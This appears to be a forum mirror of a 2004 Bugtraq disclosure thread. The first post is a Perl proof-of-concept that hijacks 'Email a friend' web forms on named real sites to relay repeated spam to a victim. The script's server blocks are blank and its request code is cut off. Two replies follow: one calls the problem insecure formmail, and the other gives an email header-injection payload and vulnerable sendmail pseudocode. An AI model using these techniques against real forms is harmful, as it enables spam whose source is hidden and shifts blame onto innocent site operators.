Bekijk Volledige Versie : Spammers can hide behind 'Email a friend/article' scripts.

27/04/04, 02:05
# Author: Vengy
# Email: cyber_flash@hotmail.com
# Description: Spammers can hide behind 'Email a friend/article' scripts.
# How it works:
# -------------
# This simple perl script will send just 3 identical fake spam messages
# to 'yourname@yourdomain.com' from 'vengy@spam4u.com'. Example:
# +------------------------------------------+
# | From : <vengy@spam4u.com> |
# | Sent : Friday, April 9, 2004 6:34 PM |
# | To : <yourname@yourdomain.com> |
# | Subject : To spam or not to spam! |
# | |
# | Urgent! Call me: 1-900-EAT-SPAM |
# | |
# | www.spammmmmm.com |
# +------------------------------------------+
# If a spammer or victim sends junk email directly to their ISP SMTP servers,
# network Admins can trace back the connection and deal with the problem.
# But, the 'Email a friend' technique will deflect a significant portion of
# the complaints away from spammers and towards the administrators of the hijacked host.
# There are possibly zillions of insecure 'Email a friend/article' on the web! (just google it)
# Many allow multiple unrestricted emails to be sent separated by comma's.
# (Imagine an automated harvester to compile a list of open spam servers!)
# For demonstrational purposes, here are two random servers:
# Host: Outgoing SMTP Server: Email Originator:
# ===== ===================== =================
# www.wcqp.com relay.westlaw.com eg-fsite-b12.ecom.tlrg.com
# edinburghnews.scotsman.com macdui.scotsman.com 80-75-65-10.eqsn.net
# Notes: Relaying is denied (550) when connecting directly to the SMTP servers.
# However, by using email forms, the Originator has access to send messages!
# Arguments to Send_SPAM are:
# ---------------------------
# 1. Webserver.
# 2. Email script.
# 3. Host.
# 4. Content.
# 5. Email address of Victim.
# 6. Number of copies to send.

use IO::Socket::INET qw(CRLF);

my $victim = 'yourname@yourdomain.com';
my $copies = 3;
my $sender_email = 'vengy@spam4u.com';
my $sender_name = 'vengy';
my $subject = 'To+spam+or+not+to+spam%21';
my $body = 'Urgent!+Call+me:+1-900-EAT-SPAM';
my $spam_url = 'http%3A%2F%2Fwww.spammmmmm.com';

################## Spam Server #1 ##################
'friend_name='.("%2C" x ($copies-1)).'&friend_email='.$victim.'&your_name='.$sender_name.'&your_email='.$sender_email.'&subject='.$subject.'&comments='.$body.'&url='.$spam_url,

################## Spam Server #2 ##################

################## Spam Server #3 ##################

sub Send_SPAM {
my ($server,$url,$host,$content,$email_to,$email_num) = @_;

$repeat_email_to = ($email_to."%2C") x $email_num;
substr($repeat_email_to,-3,3) = "";
$content =~ s/$email_to/$repeat_email_to/;

$sock = IO::Socket::INET->new(PeerAddr => $server ,PeerPort => 'http(80)',Proto => 'tcp');
die "$!" unless $sock;

print $sock 'POST /'.$url.' HTTP/1.1',CRLF,
'Host: '.$host,CRLF,
'Content-Type: application/x-www-form-urlencoded',CRLF,
'Content-Length: '.length($content),CRLF,
'Connection: Keep-Alive',CRLF,
'Cache-Control: no-cache',CRLF x 2,

close $sock;

print "Sent SPAM from server: $server\n";

28/04/04, 03:25
Dear cyber_flash@hotmail.com,

--Tuesday, April 27, 2004, 12:26:13 AM, you wrote to bugtraq@securityfocus.com:

chc> # Author: Vengy
chc> # Email: cyber_flash@hotmail.com
chc> # Description: Spammers can hide behind 'Email a friend/article' scripts.

This is usually called "insecure formmail". Multiple DNSBLs list
insecure formmails among over potential spam sources, like open relays
and open proxies. Search google for formmail DNSBL.

Æàëî ìíå íå ïîíàäîáèòñÿ (Ñ. Ëåì)

28/04/04, 03:45
> # Description: Spammers can hide behind 'Email a friend/article' scripts.

These are just an instance of the more general form hijacking attacks. I've
seen several attempts to abuse feedback forms and similar through a simple
scheme - each form field was filled with

"To: <someaddr>\nFrom: <someaddr>\n"

Form scripts that do not check for newlines within the fields are vulnerable
to those attacks in general, for example in perl pseudocode:

open(SENDMAIL, "|/usr/sbin/sendmail -someflags")
or print "Some Error: $!\n";
print SENDMAIL "From: $formfield_from\n";
print SENDMAIL "To: $recipient-taken-from-some-config\n";
print SENDMAIL "Subject: Foo Bar '$formfield_subject'\n";
print SENDMAIL "\nMail content\n";

If $formfield_subject contains the above line with additional To:s, it
depends on the MTA whether he parses the additional headers and sends
them along.

Around end of march/beginning of april 2004 I've seen a number of attempts
to abuse such scripts. It look like a systematic approach and not some
random guesses.

-- Matthias

Matthias' Braindump http://matthias.leisi.net/